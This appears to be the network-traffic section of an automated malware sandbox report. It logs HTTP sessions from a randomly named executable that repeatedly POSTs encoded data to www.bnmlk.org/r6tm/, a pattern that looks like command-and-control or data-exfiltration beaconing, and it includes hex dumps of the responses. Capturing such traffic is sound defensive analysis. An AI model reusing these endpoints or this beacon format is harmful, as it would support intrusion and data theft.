                                                    Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                    Sep 5, 2024 14:25:58.268486023 CEST1236INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                    Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                    Sep 5, 2024 14:25:58.268503904 CEST1236INData Raw: 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c
                                                    Data Ascii: width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /
                                                    Sep 5, 2024 14:25:58.268517971 CEST896INData Raw: 38 2e 36 36 36 33 31 20 31 2e 32 34 39 39 32 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32
                                                    Data Ascii: 8.66631 1.249922,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000
                                                    Sep 5, 2024 14:25:58.268529892 CEST1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                    Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                    Sep 5, 2024 14:25:58.268543005 CEST1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                    Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                    Sep 5, 2024 14:25:58.268553972 CEST448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                    Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                    Sep 5, 2024 14:25:58.270776987 CEST1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                    Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                    Sep 5, 2024 14:25:58.270786047 CEST1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                    Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                                                    Sep 5, 2024 14:25:58.273403883 CEST1236INData Raw: 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74
                                                    Data Ascii: oke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.55720813.248.151.237802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:03.960134983 CEST693OUTPOST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 58 43 4a 48 41 52 64 36 2b 4c 35 49 77 65 47 64 56 78 69 4c 75 6f 70 33 76 58 74 37 74 56 73 7a 4e 2b 63 2f 4d 79 52 30 43 6f 57 44 67 58 78 62 78 6a 55 45 72 35 41 41 50 74 74 6f 75 50 50 4c 75 58 68 73 41 62 35 6e 48 79 62 66 48 48 44 72 6c 37 62 47 42 77 6b 72 43 55 74 68 54 2f 61 6a 31 48 67 61 39 32 65 2b 53 4a 35 50 75 72 57 72 37 2f 48 4b 53 61 6b 48 45 53 53 6e 32 43 61 32 77 39 79 66 4a 53 79 4f 61 6a 69 6f 65 61 6c 63 35 56 48 4c 76 43 72 73 77 61 37 47 2f 56 57 68 35 41 35 63 50 6d 4d 73 54 78 34 4c 6f 37 2f 33 32 71 73 41 72 39 33 7a 74 42 63 3d
                                                    Data Ascii: V6h=51DU5kSYZLLtXCJHARd6+L5IweGdVxiLuop3vXt7tVszN+c/MyR0CoWDgXxbxjUEr5AAPttouPPLuXhsAb5nHybfHHDrl7bGBwkrCUthT/aj1Hga92e+SJ5PurWr7/HKSakHESSn2Ca2w9yfJSyOajioealc5VHLvCrswa7G/VWh5A5cPmMsTx4Lo7/32qsAr93ztBc=
                                                    Sep 5, 2024 14:26:04.414572954 CEST315INHTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:04 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.55720913.248.151.237802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:06.500579119 CEST713OUTPOST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 47 53 5a 48 43 32 4a 36 76 37 35 4c 75 4f 47 64 66 52 69 78 75 6f 31 33 76 53 64 56 74 6d 49 7a 4e 65 4d 2f 4e 77 70 30 4c 34 57 44 71 33 78 65 2f 44 55 78 72 35 63 69 50 74 68 6f 75 4a 6a 4c 75 54 70 73 41 4d 74 6d 48 69 62 64 65 33 44 74 6d 4c 62 47 42 77 6b 72 43 55 35 62 54 37 2b 6a 31 33 51 61 38 58 65 2f 59 70 35 4d 72 62 57 72 2f 2f 48 4f 53 61 6c 69 45 54 4f 4e 32 48 65 32 77 34 4f 66 49 41 4b 4e 4a 44 69 75 61 61 6b 44 78 41 69 59 6f 41 2f 4e 79 4d 6d 41 2f 7a 43 66 34 32 55 32 56 45 45 45 41 52 55 7a 34 6f 33 41 6e 61 4e 70 78 65 6e 44 7a 57 4c 46 7a 6d 70 79 2f 71 68 4a 64 53 30 38 71 30 52 6d 36 57 76 36
                                                    Data Ascii: V6h=51DU5kSYZLLtGSZHC2J6v75LuOGdfRixuo13vSdVtmIzNeM/Nwp0L4WDq3xe/DUxr5ciPthouJjLuTpsAMtmHibde3DtmLbGBwkrCU5bT7+j13Qa8Xe/Yp5MrbWr//HOSaliETON2He2w4OfIAKNJDiuaakDxAiYoA/NyMmA/zCf42U2VEEEARUz4o3AnaNpxenDzWLFzmpy/qhJdS08q0Rm6Wv6
                                                    Sep 5, 2024 14:26:06.979032993 CEST315INHTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:06 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.55721013.248.151.237802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:09.041007996 CEST1730OUTPOST /r6tm/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.bnmlk.org
                                                    Referer: http://www.bnmlk.org/r6tm/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 35 31 44 55 35 6b 53 59 5a 4c 4c 74 47 53 5a 48 43 32 4a 36 76 37 35 4c 75 4f 47 64 66 52 69 78 75 6f 31 33 76 53 64 56 74 6d 41 7a 4d 6f 41 2f 4d 58 39 30 5a 6f 57 44 30 6e 78 66 2f 44 55 6f 72 35 45 6d 50 74 39 57 75 4d 2f 4c 76 78 78 73 58 4e 74 6d 4e 69 62 64 57 58 44 73 6c 37 62 58 42 78 49 76 43 55 70 62 54 37 2b 6a 31 78 30 61 38 47 65 2f 65 70 35 50 75 72 57 5a 37 2f 48 6d 53 63 4d 66 45 54 4b 33 32 7a 71 32 77 5a 2b 66 4b 31 6d 4e 54 44 69 73 64 61 6b 4c 78 41 6e 41 6f 41 7a 2f 79 4d 36 6d 2f 30 32 66 30 43 56 2f 4d 47 34 53 53 42 34 77 79 71 2f 69 2b 4e 4a 70 35 63 76 76 78 6e 7a 2f 77 45 4e 72 79 2b 4d 4c 58 57 39 44 32 77 6c 46 34 57 54 32 6e 36 4d 62 76 76 31 56 75 62 32 51 30 47 4d 73 79 61 31 48 52 6a 62 4a 2b 6d 52 45 51 77 66 56 50 31 50 43 45 43 49 6a 52 70 36 4e 4b 6b 68 66 4d 76 71 71 6c 77 63 58 5a 59 43 4e 51 4b 6e 4a 48 47 52 76 2b 48 52 63 6f 47 6a 75 52 36 72 5a 38 7a 35 32 6b 54 59 4e 38 54 43 53 72 5a 61 66 4b 78 65 42 35 46 71 47 35 51 7a 62 70 56 49 63 77 32 [TRUNCATED]
                                                    Data Ascii: V6h=51DU5kSYZLLtGSZHC2J6v75LuOGdfRixuo13vSdVtmAzMoA/MX90ZoWD0nxf/DUor5EmPt9WuM/LvxxsXNtmNibdWXDsl7bXBxIvCUpbT7+j1x0a8Ge/ep5PurWZ7/HmScMfETK32zq2wZ+fK1mNTDisdakLxAnAoAz/yM6m/02f0CV/MG4SSB4wyq/i+NJp5cvvxnz/wENry+MLXW9D2wlF4WT2n6Mbvv1Vub2Q0GMsya1HRjbJ+mREQwfVP1PCECIjRp6NKkhfMvqqlwcXZYCNQKnJHGRv+HRcoGjuR6rZ8z52kTYN8TCSrZafKxeB5FqG5QzbpVIcw2w9v+FYidoWWvnVRk7LlWwy3gjK6vs9RkySXftaJaQxcupLr7oG54c997ljJaEq92xFhdApWl7sfpp5aGBNQKL5lRw1feJaoqbLWSk+LeWf6E/LVbJrnYfe3XTq9/oPRPMaRejRj0LUSA3OLZuokGeIq3LeA2uYFRt3M82H2nt/Bv/PdaEmS7BiE+IjusDf14fugYDe377h8cFwEElh2OVCUIlrR1YWFEM+TYfHT+bqgYaRhnUTpelRDY9dtatpxrOuj3bdiWKQ4zczgFsTNqGj6cpsE1IAF7Hv/v3pfy2wMONyqHl06hLzJfJcshV7SZeX4FPB1fWHsxJe/qIOBSePRmQwS/EGTF+BAWSwbaA8OKxw8M/Kp0+POTxndnU2t/FYsSdPJozuHLnQdj961ICUbfdq1c0GmauFU2YZnGmDrM4UlfGNp+29SnJjpayDZWwxWb/zYYQ4sdgB1MSvkAWWuTB+L0mJinFiGqVgfvCUkf0PiicU3V2tXOt78y8SI8prYuj7efwEwUrylexW09a3j7kto4uDumhg0TCNGAQuS0ZXzpqg+qfyeMwa+rHjwIPeOXmPyf/Sj+S4ni0BOb/wCPYbQxW8fjgij5TXend9WfwYeoNcBXE9VoGapB3aqhRVv8qrDFYssNGPQrLtlqIDMBTsiPW7iJ0B [TRUNCATED]
                                                    Sep 5, 2024 14:26:09.498462915 CEST315INHTTP/1.1 403 Forbidden
                                                    Date: Thu, 05 Sep 2024 12:26:09 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Content-Encoding: gzip
                                                    Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.55721113.248.151.237802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:11.571048975 CEST444OUTGET /r6tm/?sH=nVVHdDTx2PSTVJ&V6h=03r06RSocIWRHlQMBHZ7/ZdxuKKmGlmlv7BltFVQgkYFIdRnDBF7O8WDu3tP30gBrpd5Hehkjcnr6TVmd9giBmXATSrzqLCUTktLP3Nid+3n62oF5w/Mdat6l5CFzOydDA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.bnmlk.org
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:12.167295933 CEST1236INHTTP/1.1 200 OK
                                                    Date: Thu, 05 Sep 2024 12:26:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: nginx
                                                    Vary: Accept-Encoding
                                                    Vary: Accept-Encoding
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SGpfTtKeSXeYdcrzNxA+gYzI0inhX9kF4uUYiJQv39X7wG0F2ND2OiuAtPNWhjsUqFIl4vUlFCk2LpROl0Nt7g==
                                                    Accept-CH: viewport-width
                                                    Accept-CH: dpr
                                                    Accept-CH: device-memory
                                                    Accept-CH: rtt
                                                    Accept-CH: downlink
                                                    Accept-CH: ect
                                                    Accept-CH: ua
                                                    Accept-CH: ua-full-version
                                                    Accept-CH: ua-platform
                                                    Accept-CH: ua-platform-version
                                                    Accept-CH: ua-arch
                                                    Accept-CH: ua-model
                                                    Accept-CH: ua-mobile
                                                    Accept-CH-Lifetime: 30
                                                    X-Domain: bnmlk.org
                                                    X-Subdomain: www
                                                    Data Raw: 31 64 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 53 47 70 66 54 74 4b 65 53 58 65 59 64 63 72 7a 4e 78 41 2b 67 59 7a 49 30 69 6e 68 58 39 6b 46 34 75 55 59 69 4a 51 76 33 39 58 37 77 47 30 46 32 4e 44 32 4f 69 75 41 74 50 4e 57 68 6a 73 55 71 46 49 6c 34 76 55 6c 46 43 6b 32 4c 70 52 4f 6c 30 4e 74 37 67 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED]
                                                    Data Ascii: 1d22<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SGpfTtKeSXeYdcrzNxA+gYzI0inhX9kF4uUYiJQv39X7wG0F2ND2OiuAtPNWhjsUqFIl4vUlFCk2LpROl0Nt7g==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, init
                                                    Sep 5, 2024 14:26:12.167320967 CEST1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 62 6e 6d 6c 6b 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63
                                                    Data Ascii: ial-scale=1, shrink-to-fit=no"/> <title>bnmlk.org</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;display: inline
                                                    Sep 5, 2024 14:26:12.167332888 CEST448INData Raw: 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 0a 20 20 20 20 66 6f 6e
                                                    Data Ascii: { padding:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px;}.comp
                                                    Sep 5, 2024 14:26:12.167351007 CEST1236INData Raw: 6d 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 34 30 70 78 3b 0a 7d 0a 0a 2e 77 72 61 70 70 65 72 33 20 7b 0a 20 20 20 20 62 61 63 6b
                                                    Data Ascii: m.png') no-repeat center bottom; padding-bottom:140px;}.wrapper3 { background:#fff; max-width:300px; margin:0 auto 1rem; padding-top:1px; padding-bottom:1px;}.onDesktop { display:none;}.tcHolder { paddi
                                                    Sep 5, 2024 14:26:12.167363882 CEST1236INData Raw: 20 20 20 20 7d 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 66 61 6c 6c 62 61 63 6b 2d 74 65 72 6d 2d 68 6f 6c 64 65 72 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e
                                                    Data Ascii: }}</style> <style media="screen">.fallback-term-holder { display: inline-grid; grid-template-columns: 1fr; width: 100%; padding-top: 50px;}.fallback-term-link { grid-column: 1 / span 1; align-self: center;
                                                    Sep 5, 2024 14:26:12.167373896 CEST1236INData Raw: 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61
                                                    Data Ascii: max-width: 980px; font-size: 80%; font-family: sans-serif; box-shadow: 0 1px 6px rgba(0,0,0,.2); max-height: 65px; display: flex; align-items: center; overflow: hidden; text-align: right; } .reg-logo {
                                                    Sep 5, 2024 14:26:12.167386055 CEST1236INData Raw: 78 20 30 3b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 39 36 25 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 7a 2d 69 6e 64 65 78 3a 20 32 30 3b 0a 09 7d 0a 0a 09 2e 73 61 6c 65 5f
                                                    Data Ascii: x 0;width: 900px;max-width:96%;margin: 0 auto;z-index: 20;}.sale_link_bold a {font-weight: bold;text-decoration: underline;color: rgb(0,0,0);font-size: 14px;}.sale_link_bold a:hover {color: rgb(100,100,100)
                                                    Sep 5, 2024 14:26:12.167398930 CEST387INData Raw: 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0a 20 20 20 20 76 61 72 20 74 63 62 6c 6f 63 6b 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 71 75 69 72 65 64 20 61 6e 64 20 73 74 65 61 64 79 0a 20 20 20 20 20 20 20 20 27 63 6f 6e 74
                                                    Data Ascii: age="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colorBackground': 'transparent', 'number': 3, // Font-Sizes and Line-He
                                                    Sep 5, 2024 14:26:12.167412043 CEST1236INData Raw: 31 30 30 30 0d 0a 6f 6e 27 3a 20 27 23 61 61 61 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 54 69 74 6c 65 4c 69 6e 6b 27 3a 20 27 23 30 32 37 37 62 64 27 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 41 6c 70 68 61 62 65 74 69 63 61 6c 6c 79 0a
                                                    Data Ascii: 1000on': '#aaa', 'colorTitleLink': '#0277bd', // Alphabetically 'horizontalAlignment': 'center', 'noTitleUnderline': false, 'rolloverLinkColor': '#01579b', 'verticalSpacing': 10 }; var
                                                    Sep 5, 2024 14:26:12.167423010 CEST1236INData Raw: 20 20 20 20 20 20 20 6c 65 74 20 64 6f 6d 61 69 6e 3d 27 62 6e 6d 6c 6b 2e 6f 72 67 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 73 63 72 69 70 74 50 61 74 68 3d 27 27 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 61 64 74 65 73 74 3d 27 6f 66 66 27
                                                    Data Ascii: let domain='bnmlk.org'; let scriptPath=''; let adtest='off';if(top.location!==location) { top.location.href=location.protocol + '//' + location.host + location.pathname + (location.search ? location.search + '&' : '?') +
                                                    Sep 5, 2024 14:26:12.172365904 CEST1236INData Raw: 63 6b 69 6e 67 49 44 29 2b 20 22 26 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 2b 20 22 26 64 61 74 61 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 4a
                                                    Data Ascii: ckingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': function (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;


